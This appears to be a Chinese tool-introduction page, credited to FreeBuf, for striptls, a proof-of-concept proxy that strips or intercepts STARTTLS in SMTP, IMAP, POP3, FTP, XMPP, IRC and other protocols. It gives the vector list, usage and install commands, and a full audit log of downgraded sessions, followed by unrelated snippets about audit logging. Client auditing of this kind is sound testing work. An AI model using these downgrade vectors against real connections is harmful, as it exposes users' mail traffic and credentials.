软件概览
STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。
striptls是一款端口剥离攻击的POC实现
SMTP
SMTP.StripFromCapabilities - server response capability patchSMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response codeSMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)SMTP.StripWithTemporaryErrorSMTP.StripWithErrorSMTP.ProtocolDowngradeStripExtendedModeSMTP.InjectCommand
POP3
POP3.StripFromCapabilitiesPOP3.StripWithErrorPOP3.UntrustedIntercept
IMAP
IMAP.StripFromCapabilitiesIMAP.StripWithErrorIMAP.UntrustedInterceptIMAP.ProtocolDowngradeToV2
FTP
FTP.StripFromCapabilitiesFTP.StripWithErrorFTP.UntrustedIntercept
NNTP
NNTP.StripFromCapabilitiesNNTP.StripWithErrorNNTP.UntrustedIntercept
XMPP
XMPP.StripFromCapabilities XMPP.StripInboundTLS XMPP.UntrustedIntercept ACAP (untested) ACAP.StripFromCapabilities ACAP.StripWithError ACAP.UntrustedIntercept
IRC
IRC.StripFromCapabilitiesIRC.StripWithErrorIRC.UntrustedInterceptIRC.StripWithNotRegisteredIRC.StripCAPWithNotregisteredIRC.StripWithSilentDrop
结果:
- [*] client: 127.0.0.1- [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>- [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>- [ ] <class striptls.StripFromCapabilities at 0xffd316bc>- [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>- [*] client: 192.168.139.1- [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>- [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>- [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>
实例:
#> python -m striptls --help # from pip/setup.py#> python striptls --help # from source / root folderUsage: striptls [options] example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options: -h, --help show this help message and exit -v, --verbose make lots of noise [default] -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:<remote_port>] -r REMOTE, --remote=REMOTE remote target ip:port to forward sessions to -k KEY, --key=KEY SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem] -x VECTORS, --vectors=VECTORS Comma separated list of vectors. Use 'ALL' (default) to select all vectors. Available vectors: FTP.StripFromCapabilities, FTP.StripWithError, FTP.UntrustedIntercept, IMAP.StripFromCapabilities, IMAP.StripWithError, IMAP.UntrustedIntercept, NNTP.StripFromCapabilities, NNTP.StripWithError, NNTP.UntrustedIntercept, POP3.StripFromCapabilities, POP3.StripWithError, POP3.UntrustedIntercept, SMTP.ProtocolDowngradeStripExtendedMode, SMTP.StripFromCapabilities, SMTP.StripWithError, SMTP.StripWithInvalidResponseCode, SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept, XMPP.StripFromCapabilities, XMPP.StripInboundTLS, XMPP.UntrustedIntercept [default: ALL]
安装:
1.从pip安装
#> pip install striptls
2.从源安装
#> setup.py install
示例:
inbound outbound [inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target] smtp-client striptls remote/target
本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25
审计模式:
在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl + C来中止审核并打印结果。
#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP): <class striptls.StripWithError at 0xffd4635c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP): <class striptls.StripWithError at 0xffd4629c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP): <class striptls.StripWithError at 0xffd4641c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3): <class striptls.StripWithError at 0xffd461dc>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithError at 0xffd4614c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:5222 , proto: XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
2016-02-02 22:11:56,276 - INFO - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
2016-02-02 22:12:08,477 - DEBUG - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithInvalidResponseCode new: True>
2016-02-02 22:12:09,759 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - <Session 0xffcf6e4cL> [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING - <Session 0xffcf6e4cL> terminated.
2016-02-02 22:12:13,056 - DEBUG - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithTemporaryError new: True>
2016-02-02 22:12:14,197 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG - <Session 0xffd0918cL> [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING - <Session 0xffd0918cL> terminated.
2016-02-02 22:12:16,649 - DEBUG - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG - <Session 0xffd0926cL> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripFromCapabilities new: True>
2016-02-02 22:12:17,760 - DEBUG - <Session 0xffd0926cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG - <Session 0xffd0926cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING - <Session 0xffd0926cL> terminated.
2016-02-02 22:12:20,071 - DEBUG - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithError new: True>
2016-02-02 22:12:21,181 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG - <Session 0xffd0934cL> [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING - <Session 0xffd0934cL> terminated.
2016-02-02 22:12:23,665 - WARNING - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO - -- audit results --
2016-02-02 22:12:23,666 - INFO - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:12:23,666 - INFO - [ ] <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接(对于客户端则是不在检验服务端的证书是否可信)以及XMPP的追踪审计的功能。
介绍内容来自 FreeBuf黑客与极客(FreeBuf.COM)
相关资料
-
这个部分是关于熟悉应用程序编译为本地代码时显现的漏洞。对一门编译语言编写应用程序时的精准和完整理解,在没有学习编译器怎样转换源代码为机器语言和处理器怎么执行代码前是无法达到的。一种简单的获得这些转换经验的方式是通过逆向工程你自己的代码或源码可见的项目。在这个部分结束时你将会识别用诸如C和C++编译语言编写的常见漏洞。 大型软件包由于使用第三方软件库导致漏洞普遍存在。常见的例子包括像libxml、l
-
一旦Spring Security发挥作用,Spring Boot Actuator就有一个灵活的审计框架,可以发布事件(默认情况下,“身份验证成功”,“失败”和“访问被拒绝”例外)。 此功能对于报告和基于身份验证失败实施锁定策略非常有用。 要自定义已发布的安全事件,您可以提供自己的AbstractAuthenticationAuditListener和AbstractAuthorizationA
-
我的项目中有几个类是由Hibernate处理的,有些是由Envers审核的,有些则不是。现在,当我试图保存某个未经审计的实体时,我得到了以下信息: 有些人可能认为我的数据库中没有审计表,但是Envers甚至不应该试图寻找这个表,因为实体没有被审计。我的类看起来像这样: 因此,每个类都包含一个子类列表,其中包含对其父类的引用。这些类都没有用-注释标记,但它们引用了一些已审核的实体。然而,每个引用都用
-
日志审计支持查看平台上的所有操作日志以及公有云的操作日志等。 操作日志 操作日志用于显示系统中所有操作信息。 云上日志 将公有云操作日志同步到云联壹云平台上统一查看。
-
该账号及其子账号的所有操作记录和登录日志,便于在发生问题时用户及时查看。 操作日志 登录历史 操作日志 记录用户及其子用户在页面的所有操作行为,可对操作行为进行追溯,并按照功能模块、操作行为等进行查询。 登录历史 记录用户及其子用户的所有登录行为,包括登录时间、登录IP、用户名、浏览器版本、登录方式等。
-
有许多选项可用于在审计扫描期间配置Burp Scanner的行为。这些可以在Burp启动扫描时即时配置,或是在 Burp 的配置库中修改其配置。 优化审计 通过这些设置,您可以调整审计的整体逻辑行为,来达到针对目标的一个更好的审计效果。 优化审计可以使用如下配置: 审计速度 - 此选项确定在检查漏洞时某些审计的深度。 快速(Fast)会进行较少的请求,检查某些漏洞时也只是做一个基础审计。 深入(T